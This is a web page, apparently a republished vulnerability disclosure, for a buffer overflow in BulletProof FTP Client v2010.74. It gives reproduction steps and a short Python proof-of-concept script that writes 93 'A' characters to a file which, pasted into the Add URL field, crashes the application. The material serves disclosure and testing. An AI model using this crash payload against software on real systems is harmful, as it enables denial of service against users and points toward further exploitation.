Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Exploit Title: BulletProof FTP Client v2010.74 - Buffer Overflow (PoC)
Discovered Exploit Title: BulletProof FTP Client v2010.74 - Buffer Overflow (PoC)
Discovered by: Ahmet ?mit BAYRAM
Discovered Date: 14.09.2023
Vendor Homepage: http://www.bpftp.com
Software Link: https://download.bpftp.com/mirrors.html?file=
bpftpclient_install.exe
Tested Version: v2010.74 (latest)
Tested on: Windows 2019 Server 64bit
Steps to Reproduce

Open the BulletProof FTP Client application.
Click on Add URL.
Paste the content of poc.txt and save it.
The application should crash due to a buffer overflow.

Proof of Concept (PoC)

The following script generates a poc.txt file containing a payload that,
when loaded into the Add URL field, triggers the buffer overflow and causes
the application to crash.

#!/usr/bin/python

poc = 'A' * 93

try:
file = open("poc.txt", "w")
file.write(poc)
file.close()
print("POC is created")
except Exception as e:
print("POC is not created:", e)
Social Media Share